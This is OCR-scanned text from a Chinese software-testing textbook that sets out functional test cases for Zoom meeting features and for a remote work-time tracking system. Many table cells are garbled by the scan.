I 关闭 主持 人 共享 屏幕 ,展示 参 
击 “ 共 享 "按钮 isl 
(4) 主持 人 设置 所 有 参与 者 可 以 共 
享 且 同时 多 人 共享 , 参 会 者 单 | s n 
击 * 共 享 "按钮 
CD 主持 人 设置 仅 主持 人 可 以 在 别 
人 共享 的 同时 开始 共享 ,主持 | (1) 提示 可 停止 别人 的 共享 后 共享 
人 单 击 "共享 "按钮 主持 人 的 屏幕 , 单 击 确认 主持 
共享 设置 “设置 谁 | (2) 主持 人 设置 仅 主持 人 可 以 在 别 | 。 人 开始 共享 
可 以 在 别人 共享 的 | — 人 共享 的 同时 开始 共享 , 参 会 | (2) 提示 其 他 人 正在 共享 屏幕 ,此 
同时 开始 共享 者 单 击 "共享 "按钮 时 无 法 进行 屏幕 共享 





(3) 主持 人 设置 所 有 参与 者 可 以 在 
别人 共享 的 同时 开始 共享 , 参 
会 者 单 击 “ 共 享 ”按钮 





(3) 停止 别 的 共享 ,从 而 开始 自己 
的 共享 
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续 表 
实际 测试 
测试 用 例 标题 BE 期 望 结果 Fond 
CD 弹出 窗口 提示 : 选择 想 共享 的 
窗口 ,桌面 以 及 桌面 上 打开 的 
单个 窗口 ,比如 Word 文档 、 济 
览 器 等 
(D 别人 可 看 到 共享 者 在 计算 机 和 
— 面 上 的 所 有 操作 , 且 共 享 中 “新 
sie eie 的 共享 ”按钮 置 灰 不 可 用 
O ANARAM g H Word x © 别人 只 可 看 到 共享 者 在 Word 
屏 基 共享 一 屏 大 共 | 这: 文档 上 的 操作 ,切换 到 浏览 器 
享 的 功能 . I 窗口 时 ,别人 看 到 的 是 Word 
E iu t DE 文档 最 后 一 个 操作 面 面 , 且 共 
dei obe 享 中 “新 的 共享 "按钮 可 单 击 
(4) 可 选择 新 的 想 共享 的 窗口 
(5) 共享 窗口 不 关闭 ,操作 别人 看 
不 见 ,可 单 击 “继续 共享 "按钮 
继续 共享 屏幕 
© 回 到 会 议 首页 ,别人 不 再 能 看 
到 共享 者 屏幕 
CD 进入 注释 模式 ,展示 注释 所 需 
选项 ,包括 鼠标 ,画笔 .字体 设 
置 ,文本 输入 及 清除 竺 
(2) 鼠标 ; 使 用 鼠标 控制 桌面 ; 选 
CD 单 击 “注释 " 择 , 选择 显示 区 域 ; €: 书写 
CD 分 别 单 击 “鼠标 选择“ 笔 "和 | RAT: 激光 笔 : 在 共享 内 容 
屏幕 共享 一 注释 | "mote" 上 提示 
功能 (3) 单 击 * 文 本 "和 “格式 ” O 文本 : 输入 文本 注释 ; 格式 ， 
(4) 注释 中 消除 功能 设置 线条 和 字体 样式 
(5) 单 击 “保存 "按钮 CD 擦 除 .撤销 、 重 做 功能 正常 , 清 
除 还 可 以 选择 清除 所 有 ,还 是 
只 清除 自己 标注 的 ,或 者 只 清 
除 别人 标注 的 
(5) 将 屏幕 注释 内 容 保存 下 来 
CD 主持 人 在 "更 多 "下 拉 列 表 中 选 | 1) 屏幕 共享 时 的 注释 过 程 , 只 能 
屏幕 共享 一 主持 人 | 。 择 * 禁 止 参 会 者 标注 ” 主持 人 写 注释 
禁止 参 会 人 标注 (D 主持 人 未 选择 “禁止 参 会 者 标 |(2) 屏幕 共享 时 的 注释 过 程 , 参 会 
i" 人 员 都 可 以 写 注释 
CD 基本 会 议 功能 设置 人 
(2) 共享 时 在 “更 多 "下拉 列 表 中 选 | ， 闭 摄像 头 ,打开 或 关闭 语音 
屏 攻 共享 ~ 共享 时 | 7 ERR AT (2) 弹出 新 窗口 ,功能 与 会 议 功能 
能 使 用 的 会 议 功能 的 聊天 和 邀请 一 样 





D 共享 时 主持 人 和 参 会 者 不 同 的 
几 个 会 议 功能 





O 管理 参 会 者 .录制 和 结束 会 议 ， 
功能 和 权限 与 会 议 功能 的 相同 
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x 专家 点 评 


共享 屏幕 是 在 线 会 议 最 重要 功能 之 一 ,让 套 会 者 虽然 不 在 一 个 地 方 开会 ,但 也 不 影响 交 
流 和 沟通 。 共 享 屏幕 可 选择 则 是 Zoom 云 视 频 最 大 的 一 个 特色 ,主持 人 与 会 议 参与 者 的 权 
限 区 别 仍 是 测试 的 一 大 重点 。 扩 展 起 来 还 有 许多 需要 细 化 ,比如 主持 人 发 起 会 议 是 在 PC 
端 还 是 手机 客户 端 ,会 议 参 与 者 是 手机 打开 链接 ,还 是 计算 机 打开 链接 ,其 提示 都 不 一 样 ,这 
些 都 是 很 细 的 测试 点 ,这 里 就 不 一 一 列举 了 。 大 家 可 以 作为 思考 题 继续 发 散 设 计 测 试用 例 。 


7.7. 结束 会 议 模 块 测试 用 例 设 计 
主持 人 是 会 议 发 起 者 ,所 以 主持 人 结束 会 议 的 方式 要 比 会 议 参与 者 多 ,结束 会 议 的 功能 


同样 能 从 身份 来 划分 模块 ,但 结束 会 议 仍 需要 考虑 到 异常 突 发 情况 。 结 束 会 议 思 维 导 图 如 
图 7-10 所 示 。 

















/一 主持 人 结束 会 议 前 转交 权限 Ge 一 会议 继续 ] 














È 主持 人 结束 会 议 前 转交 权限 e— eun ) 








主持 人 单 击 离开 会 议 


结束 会 议 主持 人 突然 断 网 或 断 电 








M sssWgBUFER | 


参与 者 突然 断 电 或 断 网 





会 议 结束 时 间 到 了 

















图 7-10 ”结束 会 议 思 维 导 图 
结束 会 议 测试 用 例 , 如 表 7-5 Bros 。 
表 7-5 ”结束 会 议 测试 用 例 





实际 测试 


测试 用 例 标题 操作 步骤 期 望 结果 (Pass/Fail) 





(1) 仅 主持 人 离开 ,主持 人 权限 转 
(1) 主持 人 先 转交 主持 人 权限 , 然 交 , 会 议 继续 


后 单 击 结束 会 议 (2) 会 议 中 断 
(2) 主持 人 不 转交 主持 人 权限 , 然 | (3) 仅 主持 人 离开 ,主持 人 权限 顺 
结束 会 议 一 主持 人 后 单 击 结束 会 议 延 到 其 中 一 名 参 会 者 ,会 议 
(3) 主持 人 单 击 离开 会 议 继续 
(4) 主持 人 网 络 故障 ,或 者 硬件 |(4) 仅 主持 人 离开 ,主持 人 权限 顺 
故障 延 到 其 中 一 名 参 会 者 ,会 议 


继续 
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续 表 
实际 测试 
测试 用 例 标题 BE 期 望 结 果 iut 
一 - 
CD 参 会 者 会 议 中 单 击 ' 丙 开会 议 "| U n anam ER 
结束 会 议 一 : ^ "S 
结束 会 议 -~ 参 会 者 SS bl 
人 不 变 ,会 议 继续 
结束 会 议 一 会 议 时 | 所 有 参 会 者 不 做 任何 操作 ,预约 会 | O. _ 
间 到 议 结束 时 间 到 SKAMAN 





DS 专家 点 评 


结束 会 议 看 似 是 一 个 简单 的 功能 , 却 因为 参 会 者 权限 不 同 而 有 多 种 结束 方式 。 设 计 测 
试用 例 时 ,考虑 需要 更 全 面 ,不 能 只 考虑 单 场景 。 不管 什么 项 目 , 更 重要 的 是 各 模块 之 间 的 
联系 和 各 场景 之 间 的 影响 。 

测试 用 例 不 是 一 次 就 能 够 设计 好 的 , 写 测 试用 例 前 设计 思维 导 图 ,主要 是 为 了 整理 用 例 
设计 思路 。 当 一 个 项 目的 思维 导 图 完成 后 ,必须 反复 研究 ,看 模块 划分 是 否 合理 、 各 模块 之 
间 还 有 什么 联系 、 测 试 场景 是 否 合理 等 。Zoom 云 会 议 的 整体 测试 用 例 到 这 个 程度 ,也 是 经 
过 了 反复 修改 与 确认 。 

Zoom 云 会 议 的 主要 功能 用 例 设计 基本 上 是 这 样 ,还 能 从 这 个 框架 扩展 出 更 多 、 更 好 的 
用 例 , 每 个 人 的 思路 都 不 一 样 , 每 个 人 看 到 的 和 想到 的 肯定 也 不 一 样 , 但 Zoom 云 会 议 的 主 
要 功能 是 不 变 的 。 设 计 测 试用 例 也 是 这 样 ,不 管 什么 样 的 项 目 ,也 不 管 项 目 有 多 复杂 , 先 把 
整个 项 目 模块 化 ,再 把 各 模块 细 化 ,最 终 再 把 各 模块 串 起 来 测试 ,让 用 例 更 合理 ,也 更 饱满 ， 
思路 很 重要 。 


dif mos 


对 百度 搜索 https://www. baidu. com 进行 测试 用 例 设计 。 
提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 测试 用 例 设计 。 
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读书 笔记 


ae 


读书 笔记 Name: Date: 








励志 名 句 : A smooth sea never made a skill ful mariner. 





平静 的 海洋 练 不 出 熟练 的 水 手 。 





















































设计 在 线 协 作 类 测试 用 例 | 


实验 目的 


在 线 协作 工时 通 系 统 (以 下 简称 工时 通 系统 ) 致 力 于 解决 雇主 远程 
监管 员工 的 工作 状态 的 问题 ,主要 功能 包括 账户 注册 登录 ,账户 管理 、 
项 目 管理 .工作 时 间 管 理 ,报表 管理 和 客户 端 等 。 工 时 通 系 统 通过 上 传 
用 户 的 工作 时 间 和 屏幕 截图 ,让 雇主 轻松 查看 世界 各 地 员工 工作 情况 。 

通过 本 实验 的 学 习 , 软 件 测试 工程 师 能 自己 设计 相对 完备 的 在 线 
协作 类 测试 用 例 ,方便 自己 或 他 人 执行 这 些 测试 用 例 ,通过 经 典 测试 
用 例 的 设计 展示 ,让 每 位 读者 体会 设计 思路 。 


8.1 在 线 协作 workcard 项 目 总 述 


在 网 络 高 度 发 达 的 现代 ,很 多 产品 项 目 可 能 不 只 是 由 一 个 地 方 的 
团队 去 完成 ,而 是 由 多 个 不 同 地 方 的 团队 共同 完成 ,如 何 监管 各 个 团 
队 的 工作 状况 变 得 很 重要 。 团 队 成 员 每 天 工作 多 长 时 间 ,在 工作 时 间 
之 内 做 了 哪些 事情 ,所 做 的 事 和 工作 内 容 是 否 有 关 , 等 等 ,都 是 项 目 管 
理 者 所 关心 的 问题 。 工 时 通 系统 致力 于 解决 雇主 远程 监管 员工 的 工 
作 状 态 的 问题 。 工 时 通 网 站 网 址 为 http://www. workcard. net。 

工时 通 系统 具有 以 下 特点 。 

(1) 工时 通 系统 通过 上 传 用 户 的 工作 时 间 和 屏幕 截图 ,让 项 目 管 
理 者 轻松 查看 工作 状态 。 

(2) 想 了 解 项 目 工作 进展 ,不 需要 等 待 员工 提交 工作 报告 或 者 开 
会 时 的 汇报 。 在 工时 通 系统 中 ,可 以 实时 了 解 团队 工作 情况 ,就 像 在 
办 公 室 面对面 地 交流 一 样 。 

(3) 有 了 工时 通 实时 跟踪 工作 状态 以 及 记录 工作 时 间 ,就 不 再 需 
要 支付 不 工作 时 间 的 薪资 ,只 需要 支付 实际 工作 时 间 的 薪资 。 

(4) 工时 通 系统 可 以 帮助 团队 提高 工作 效率 ,知道 谁 在 做 什么 事 
情 , 还 能 提供 可 视 化 的 度量 标准 。 
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8.2 在 线 协作 系统 测试 用 例 设计 思路 


工时 通 系 统 主要 分 为 6 个 模块 ,在 设计 测试 用 例 时 ,最 简单 的 方法 依然 是 按 功 能 模块 分 
类 设计 。 工 时 通 系统 结构 如 图 8-1 所 示 。 



































在 线 协作 系统 一 一 工时 通 
M WE 项 T 报 客 
B B H 作 K n 
iE H 管 时 管 N 
Jii 理 理 间 理 管 
录 理 






































图 8-1 工时 通 系 统 结构 


8.3 账户 注册 登录 模块 测试 用 例 设 计 


在 进行 时 间 管 理 时 ,首先 需要 在 站 点 上 注册 账户 ,然后 就 可 以 登录 进行 各 种 操作 。 账 户 
注册 页 面 如 图 8-2 所 示 。 





v4 TuS eum me- fü TR xr om g 
Workcord.net 
创建 您 的 工时 通 账户 PF 3 
an 名 字 


全 部 功能 三 个 月 免费 试用 


产品 推广 期间 , 你 5 以 三 个 月 免费 试用 工时 通 的 
全 部 功能 ， 并 可 以 根据 你 需要 管理 的 人 数 选 择 任 
Ges. 





[Tr BEEN GR erint 





套餐 IRROEPENOUI NAI ERE. RERE) 
请 选择 套餐 


全 部 功能 三 个 月 免费 试用 ( 推广 期 间 ) 。 





假如 您 已 经 有 了 账户 , 请 点 击 这 里 登录 。 


Keg "rn TRA ,我 们 会 为 您 提供 和 付费 用 户 一 样 的 
RESIS. BUS ito Tapia 6, 
LE pd 
(fü iS , IERSSNUIBR— TR. ) 
密码 


工时 通 支持 哪些 系统 ? 


工时 通 硅 户 这 支持 Windows, MAC, Linux, 
做 的 用 户 将 使 用 工时 通 客 户 锭 记录 时 间 ,您 作为 
管理 者 可 以 使 用 Web 界 面 实时 查看 用 户 记录 89 时 
fe] ,相关 截屏 , 以 及 鞭 他 信息 。 








图 8-2 账户 注册 页 面 
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账户 注册 成 功 后 ,登录 工时 通 系统 ,登录 页 面 如 图 8-3 所 示 。 


登录 您 的 工时 通 账户 
de — 





假如 您 还 没有 账户 ， 请 在 这 里 注册 。 
假如 您 忘 了 账户 密码 , 请 点 击 这 里 。 














图 8-3 登录 页 面 


为 防止 用 户 忘记 账户 名 或 密码 ,登录 页 面 会 有 忘记 密码 入 口 ,能 重新 设置 密码 ,以 便 用 
户 继续 使 用 。 忘 记 密码 页 面 如 图 8-4 所 示 。 


忘记 了 账户 名 或 密码 









请 输入 你 的 邮箱 地 址 


输入 你 的 邮箱 地 址 后 ， 我 们 将 会 把 重 设 密码 的 步 邓 发 到 你 的 邮箱 . 


返回 登录 页 面 。 








图 8-4 忘记 密码 页 面 
账户 注册 登录 测试 用 例如 表 8-1 所 示 。 
表 8-1 账户 注册 登录 测试 用 例 


序 B 实际 测试 
号 | 测试 用 例 标题 操作 步骤 期 望 结 果 (Pass/Fail) 








OD 用 户 收 到 注册 信息 验证 的 
邮件 

(2) 单 击 邮件 中 的 验证 链接 ,账户 
注册 成 功 


(1) 打开 工时 通 的 账户 注册 页 面 
创建 工时 通 账户 “|(2) 输入 用 户 信息 
(3) 单 击 “注册 ”按钮 


e 
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EI 
序 " 实际 测试 
号 测试 用 例 标 题 操作 步骤 期 望 结果 C Pass/ Fail 
(1) 打开 工时 通 的 账户 注册 页 面 
输入 不 规范 的 邮箱 | (2) 在 邮箱 地 址 栏 输入 不 规范 的 | (1) 注册 不 成 功 
地 址 邮箱 地 址 ,比如 包含 #、 地 址 |(2) 页 面 提示 “邮箱 格式 不 正确 ” 
不 全 等 
(1) 注册 不 成 功 


输入 密码 少 于 6 个 |(1) 打开 工时 通 的 账户 注册 页 面 di 
3 | 字符 D 在 密码 栏 输入 少 于 6 个 字符 | 2 EREETEN 





COD 打开 工时 通 的 账户 注册 页 面 |(1) 注册 不 成 功 
账户 名 包含 非 英 文 | (2) 输入 账户 名 ,账户 名 中 包含 非 | (2) 页 面 提示 “账户 名 应 该 只 能 包 

















字符 英文 字符 ,比如 中 文字 符 、 中 | 。 含 英文 字母 和 数字 ,….， (英文 
文 符号 ADRE O CFTA” 
CD 打开 工时 通 的 账户 注册 页 面 |(1) ERRI 
5 | 套餐 类 型 (2) 输入 相关 信息 (2) 页 面 提示 * 您 必须 选择 一 个 套 
CD 套餐 类 型 栏 不 选择 任何 套餐 | g 
CD 打开 工时 通 账户 登录 页 面 
6 | 账户 登录 CD 输入 正确 的 账户 名 和 密码 | 账户 登录 成 功 
(3) 单 击 * 登 录 " 按 钮 
CD 不 能 登录 成 功 
, [FAR AME oie o ee (2) 页 面 提示 : 输入 值 “账户 名 ” 
码 , 直 接 登 录 : 不 能 为 空 ; 输入 值 “密码 "不 
击 “ 登 录 " 按 钮 2 
能 为 空 
, Amie mcam aun |O TERR 
或 密码 (D 输 和 错误 的 账户 名 或 者 密码 O a 
D 在 登录 页 面 单 击 “假如 您 忘 了 | (]) 用 户 收 到 重 设 密码 的 邮件 
账户 密码 ,请 单 击 这 里 ” 。 | (。) 单 击 岂 件 中 的 链接 重新 设置 
9 | 忘记 账户 密码 |D 输入 账户 邮箱 Mis 


(3) 单 击 “ 发 送 重 设 密码 信息 ” 


按钮 (3) 新 设置 的 密码 能 够 登录 成 功 

















OEIL] 


不 管 是 什么 系统 ,账户 的 注册 、 登 录 和 忘记 密码 功能 一 定 是 联动 的 ,这 里 必须 组 合集 成 
测试 通过 才能 继续 下 一 步 操作 。 因 为 账户 是 一 个 系统 提供 给 用 户 最 基本 的 保障 ,因此 ,从 注 
册 、 登 录 到 忘记 密码 ,容错 性 、 安 全 性 一 定 要 强 ,操作 一 定 要 简单 方便 ,也 就 是 说 ,用 户 体验 一 
定 要 非常 好 。 也 正 是 这 些 原因 ,导致 这 类 模块 可 以 测试 的 地 方 非常 多 ,涉及 的 知识 面 也 特别 
广 , 是 练习 编写 测试 用 例 最 好 的 实验 。 
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8.4 ”账户 管理 模块 测试 用 例 设计 1 


用 户 在 登录 账户 之 后 ,可 以 对 创建 的 账户 进行 管理 ,比如 修改 密码 、 上 传 个 人 照片 等 。 
工时 通 系统 还 能 修改 套餐 。 修 改 个 人 信息 的 界面 都 大 同 小 异 , 这 里 不 再 展示 。 工 时 通 系 统 
所 特有 的 修改 套餐 页 面 如 图 8-5 所 示 。 

















| 您 可 以 随时 升级 您 的 套餐 。 
免费 账户 WREE ”高 级 套餐 旗舰 套餐 企业 套餐 
(每 月 0.00 元 ) (每 月 60.00 元 】 (每 月 120.00 元 ) {每 月 210.00 元 ) ` (每 月 270.00 元 ) 
允许 的 用 户 数目 0 4 10 20 30 
允许 的 项 目 数 目 1 ERD 无 限制 无 限制 无 限制 
多 许 的 观 家 者 的 数目 0 无 限制 无 限制 无 限制 无 限制 
截屏 图 像 保存 的 时 间 无 限制 无 限制 无 限制 无 限制 无 限制 
报表 区 g g 
权限 控制 区 g g 区 区 
[1j eo g g 区 区 
时 间 导出 Z g 区 区 区 
第 三 方 整合 © 区 g 区 区 
Wwanecse ES EE EL 
图 8-5 修改 套餐 页 面 
账户 管理 测试 用 例如 表 8-2 所 示 。 
表 8-2 账户 管理 测试 用 例 
序 E 实际 测试 
号 测试 用 例 标题 操作 步骤 期 望 结果 (Pass/Fail) 
(1) 单 击 “账户 设置 "一 “用 户 
信息 ” 
1 | 修改 账户 密码 o 单 击 "修改 密码 ” is Finito E 
(3) 输入 新 密码 
(4) 单 击 “ 保 存 修改 ” 
O pp ERRE m^ bled 
2 | 上 传 个 人 图 像 (2) 图 像 格式 支持 JPG, JPEG, 


(2) 单 击 “ 修 改 图 像 ” 
(3) 选择 一 张 个 人 图 像 上 传 


GIF,PNG 





w 


上 传 公司 Logo 








(1) 单 击 “ 账 户 设置 ”一 “用 户 
信息 ” 

(2) 单 击 “ 修 改 Logo" 

(3) 选择 公司 Logo, 并 且 上 传 





(1) Logo 图 像 上 传 成 功 
(2) 像 格 式 支 持 JPG, JPEG, 
GIF PNG 








实验 8 ”设计 在 线 协 作 类 测试 用 例 1835 
AA 











续 表 
序 - 实际 测试 
号 测试 用 例 标 题 操作 步骤 期 望 结果 Coss 
D 单 击 “账户 设置 "一 “用 户 
信息 ” : 
4 | 修改 主题 颜色 (D 从 主题 颜色 下 拉 列 表 框 中 先 页 面 的 颜色 能 被 选择 的 颜色 替换 
择 颜色 类 型 
(1) ied 账户 设置 "一 “套餐 CD 套餐 类 型 切换 成 功 
( 
5 | 修改 套餐 类 型 (2) 选择 一 种 新 的 套餐 类 型 2) ei ti 
(3) 单 击 “ 切 换 ” 

















x 专 家 点 评 f 

账户 管理 主要 是 对 账户 基本 信息 的 管理 ,包括 个 人 信息 、 头 像 和 密码 的 管理 ,工时 通 系 
统 还 包括 公司 Logo 上 传 和 套餐 管理 ,所 有 修改 不 仅 要 有 相应 的 操作 结果 ,还 要 有 友好 的 
提示 。 





8.5 项 目 管理 模块 测试 用 例 设 计 


要 进行 时 间 管 理 ,首先 需要 创建 项 目 , 在 项 目下 面 创建 不 同 的 任务 ,然后 把 任务 分 配给 
不 同 的 人 来 完成 。 项 目 创建 成 功 后 ,还 可 以 对 项 目 进行 基本 设置 ,如 图 8-6 所 示 。 





项 目 管理 用 户 管理 模板 管理 


-Eu Project1 for 
A 
skysheng3007 创建 任务 从 而 更 加 有 条 理性 
= 任务 可 以 帮助 您 记 踪 您 和 您 的 用 户 正在 做 什么 已 经 他 们 的 时 间 用 在 什么 地 
方 。 您 可 以 和 将 不 同 的 任务 分 种 给 不 同 的 用 户 ， 这 样 您 可 以 更 好 的 管理 您 的 项 
目 。 


用 户 

= 
参数 设置 

权限 设置 











图 8-6 项 目 管理 内 容 


用 户 管 理 页 面 如 图 8-7 所 示 。 
项 目 管理 设计 测试 用 例如 表 8-3 所 示 o 
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项 目 管理 用 户 管理 模板 管理 
@ nesme 
BPE» 
用 户 梅 用 它 来 登录 
"s. 
名 * 
邮件 #* 
ER. 
再 输入 一 次 
时 区 * 回 
选择 项 目 Projecti for skysheng3007 [v] mmm mA 
角色 (ma 国 mmn 
图 8-7 用 户 管理 页 面 
表 8-3 “项目 管理 设计 测试 用 例 
" I 实际 测试 
号 | 测试 用 例 标题 操作 步骤 期 望 结果 gen 
CD SERHICA JG LE XOT PER 
“项 目 管理 ” 
1 | 创建 新 项 目 — |(2) 单 击 “创建 项 目 ” 项 目 创建 成 功 
(3) 输入 项 目 名 称 和 描述 
CD 单 击 "提交 ”按钮 
CD SERIA a LE ZUR ERU 
“项 目 管理 ”~“ 基 本 信息 ” 
iced o 单 击 项 目 名 称 后 面 的 “编辑 "按钮 | 项目 内 容 修改 成 功 
(3) 修改 项 目 名 称 和 描述 
CD 登录 站 点 , 单 击 "项 目 及 用 户 管理 "一 
“项 目 管理 ” “基本 信息 ” 
3 MRTE (D 单 击 项 目 名 称 后 面 的 “删除 " 接 钮 。 | Pridie MN 
(3) 弹出 删除 确认 对 话 框 , 单 击 “确认 ” i 
s 
CD 登录 站 点 " 单 击 " 项 目 及 用 户 管理 ”| 项 目 归档 成 功 
“项 目 管理 ”>“ 基 本 信息 ” (D 在 归档 列表 里 会 显示 刚 
4 | 昌 档 项 目 CD 单 击 项 目 名 称 后 面 的 “归档 "按钮 才 归档 的 项 目 名 称 
(3) 弹出 归档 确认 对 话 框 , 单 击 * 确 认 *|(3) 归档 的 项 目 可 以 重新 
按钮 激活 

















实验 8 设计 在 线 协 作 类 测试 用 例 “A187 
AA 









































续 表 
序 要 实际 测试 
号 测试 用 例 标题 操作 步骤 期 望 结果 (Pass/Fail) 
COD 登录 站 点 , 单 击 “ 项 目 及 用 户 管理 ”一 
“项 目 管理 "用户 ” 
D 单 击 “有 效用 户 " 文 档 框 ,如 果 存 在 有 | (1) 用 户 成 功 添加 到 项 目 中 
5 | 为 项 目 添加 用 户 效用 户 ,会 出 现下 拉 列 表 框 ,显示 有 |(2) 新 加 用 户 默认 角色 是 “成 
效用 户 名 员 ”, 可 以 修改 角色 类 型 
(3) 选择 一 个 或 者 多 个 用 户 名 ,然后 单 击 
“添加 用 户 到 本 项 目 中 ” 
OD 登录 站 点 , 单 击 “ 项 目 及 用 户 管理 ”一 
“项 目 管理 ”>“ 任 务 ” 
6 | 为 项 目 添加 任务 |(2) 单 击 “ 创 建新 任务 ” 任务 创建 成 功 
(3) 输入 任务 名 称 和 其 他 信息 , 单 击 “ 提 
交 ” 按 钮 
COD 登录 站 点 , 单 击 “ 项 目 及 用 户 管理 ”一 
“项 目 管理 ”一 “任务 ” 
7 | 编辑 任务 (2) 单 击 任务 名 称 后 面 的 “编辑 任务 "| 任务 修改 成 功 
按钮 
(3) 修改 任务 内 容 
COD 登录 站 点 , 单 击 “ 项 目 及 用 户 管理 ”一 
“项 目 管理 ”任务 ” 
8 | 删除 任务 (2) 选择 一 个 任务 删除 任务 删除 成 功 
(3) 弹出 删除 确认 对 话 框 , 单 击 “ 确 认 ” 
按钮 
COD 登录 站 点 , 单 击 “ 项 目 及 用 户 管 理 ” 一 
“项 目 管理 ”一 “参数 设置 (1) 参数 修改 成 功 
9 Le (2) 设置 参数 内 容 , 比 如 禁用 “允许 用 户 |(2) 这 个 项 目下 的 用 户 不 能 
添加 任务 ” 添加 任务 
(3) 单 击 “ 保 存 修改 ” 
COD 登录 站 点 , 单 击 “ 项 目 及 用 户 管理 "一 
“项 目 管理 ”一 “权限 设置 
- (2) 权限 设置 是 设置 成 员 用 户 是 否 可 以 | (1) 权限 设置 成 功 
10 T 查看 其 他 用 户 的 截图 (2) 被 设置 的 成 员 可 以 查看 
CD 成 员 默 认 是 只 能 查看 自己 的 截图 ,可 其 他 用 户 的 截图 
以 为 某 个 成 员 设置 可 以 查看 其 他 用 
户 的 截图 
(D 单 击 “ 项 目 及 用 户 管理 ”>“ 用 户 管理 ”| (1) 新 用 户 创建 成 功 
11 | 为 项 目 创建 用 户 |(2) 单 击 “ 创 建新 用 户 ” D 在 创建 新 用 户 时 ,可 以 为 
(3) 输入 用 户 信息 , 单 击 * 提 交 ” 按 钮 这 个 用 户 选 择 某 个 项 目 
(OD 单 击 “ 项 目 及 用 户 管理 ”>“ 用 户 管理 ”|(1) 被 邀请 的 用 户 会 收 到 
di 为 项 目 邀 请 新 |(2) Hb 883 PT 邮件 
HF (3) 输入 用 户 的 邮箱 地 址 和 其 他 信息 (2) 用 户 单 击 邮件 中 的 链接 
CD 单 击 “ 邀 请 用 户 ” 登录 或 者 注册 账户 
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x 专家 点 评 





项 目 管理 是 和 人 员 管 理 相 结合 的 ,只 要 是 管理 ,就 会 涉及 操作 权限 ,关键 安全 步骤 还 可 


以 补充 防盗 链 、 防 纂 改 的 测试 。 


8.6 工作 时 间 管 理 模 块 测试 用 例 设计 


工时 通 系 统 主要 是 用 来 管理 用 户 工作 时 间 的 。 在 时 间 管 理 页 面 中 ,可 以 查看 每 个 用 户 


的 工作 状况 。 时 间 管 理 页 面 如 图 8-8 Bras. 
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图 8-8 时 间 管理 页 面 
时 间 管 理 测试 用 例如 表 8-4 所 示 。 
表 8-4 时间 管 理 测试 用 例 





测试 用 例 标 题 操作 步骤 期 望 结果 


实际 测试 
(Pass/Fail) 





CD 可 以 查看 用 户 在 某 天 的 工作 
时 间 

(2) 可 以 查看 这 个 用 户 在 所 有 项 
目 或 者 某 个 项 目 上 的 工作 
时 间 


i 查看 用 户 的 工作 
时 间 


(1) 登录 账户 
(2) 单 击 “时 间 浏 览 ” 

















实验 8 ”设计 在 线 协作 类 测试 用 例 “A189 
AA 
































d 
" I 实际 测试 
局 | Witham 操作 步骤 期 望 结果 
CD 用 户 的 工作 时 间 主 要 是 通过 
客户 端 记录 的 
CD 登录 账户 , 单 击 “ 时 间 浏览 。 | (2) 如 果 用 户 工作 的 内 容 不 是 在 
(2) 在 右上 角 选 择 一 个 项 目 名 称 | 。 计算 机 上 操作 或 者 其 他 网 络 
2 “Sa (3) 单 击 “操作 ”一 “添加 时 间 ” 原因 等 ,不 能 通过 客户 端 上 传 
(4) 弹出 添加 离线 工作 时 间 窗 口 | 工作 记录 数据 ,就 可 以 通过 手 
O 根据 提示 添加 离线 时 间 工 添加 工作 时 间 记 录 
O 添加 的 离线 时 间 是 整个 工作 
时 间 的 一 部 分 
CD. 登录 账户 , 单 击 "时 间 浏览 ” 
CD 在 右上 角 选 择 某 个 项 目 名 称 
户 可 以 Ë 
3 | 修改 工作 时 间 |O) 选择 需要 修改 的 时 间 片段 git NEFA 
CD 单 击 "操作 ”“ 修 改 时 间 ” 
(5) 弹出 修改 时 间 的 窗口 
CD. 登录 账户 , 单 击 “ 时 间 浏览 ” 
(D 在 有 有 上 角 选 择 某 个 项 目 
O 选择 某 个 或 者 多 个 时 间 片段 
4 工作 时 ú D 3 
BT (siae -eaneepap AFBI Bukim 
(5) 弹出 确认 对 话 框 , 单 击 “ 确 认 ” 
按钮 
QD 登录 账户 , 单 击 “ 时 间 浏览 " |(1) 用 户 可 以 修改 浏览 时 间 的 视 
切换 浏览 时 间 的 视 | 7 Š à Tu 
i oin (2) 单 击 “ 网 格 视图 "一 “列表 | MER 
视图 ” (2) 默认 是 网 格 视图 
da 专家 点 评 


工作 时 间 管 理 是 工时 管理 的 核心 功能 ,需要 支持 工作 时 间 的 调整 ,离线 时 间 类 似 补 签到 
的 功能 。 


8.7 报表 管理 模块 测试 用 例 设 计 


当 用 户 工 作 一 段 时 间 之 后 ,可 以 通过 报表 来 查询 用 户 工作 时 长 ,项 目 进 度 等 。 报 表 页 面 
如 图 8-9 所 示 。 
报表 管理 测试 用 例如 表 8-5 所 示 。 
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动态 报表 已 保存 报表 [Ed 发 票 
< 本 周 12/03/2017 - 12/09/2017 y 周期 m |" 
总 计 : 260 分 钟 ost- "mau 
Ann & Hs mum "iex (AR) Oo 时 间 记录 
E] Project1 for skysheng3006 
Sky3006 sheng3006 默认 任务 12/04/2017 TE 30 分 钟 
sky3006 sheng3006 EV 12/04/07 mit 60 分 名 
sky3006 sheng3006 Taski 12/04/2017 E 3099 
sky3006 sheng3006 Taski 12/04/2007 — Eit 10248 
sky3006 sheng3006 Taski 12/06/2077 (EE 120248 
Sky3006 sheng3006 Task1 12/06/2017 Bu 10548 
在 线 2799) + 离线 用 户 iit: 260 分钟 
项 目 合计 260 分 钟 
Bit: 26099 
图 8-9 报表 页 面 
表 8-5 “报表 管理 测试 用 例 
序 实际 测试 
K 结 
号 | 测试 用 例 标 是 BIER 期 望 结果 enis 
CD 用 户 可 以 查看 在 指定 周期 内 工 
作 的 时 间 统计 
* -e ”一 “动态 D É É 
Nr SARUM RA AES o 工作 时 间 包 括 在 线 时 间 和 高 线 
报表 时 间 
(3) 动态 报表 就 是 报表 的 内 容 会 随 
着 用 户 工作 时 间 的 变化 而 变化 
[O 痘 录 账 户 , 单 击 “报表 "一 | (1) 默认 的 显示 周期 是 “ 周 ” 
2 iem “动态 报表 ” D 用 户 可 以 修改 周期 为 "天 ”… 周 ” 
(2) 修改 动态 报表 显示 的 周期 | “ARAS 
CD 在 “更 多 选项 "里 ,用 户 可 以 选择 
(1) 登录 账户 , 单 击 “报表 ”~| — 查询 某 个 或 者 多 个 项 目 
3 | 簿 选 动态 报表 内 容 | “ASRR” (2) 可 以 选择 查询 菜 个 或 者 多 个 
(2) 单 击 "显示 更 多 选项 ” 用 户 
C3) 可 以 指定 有 效 工作 时 间 范围 等 
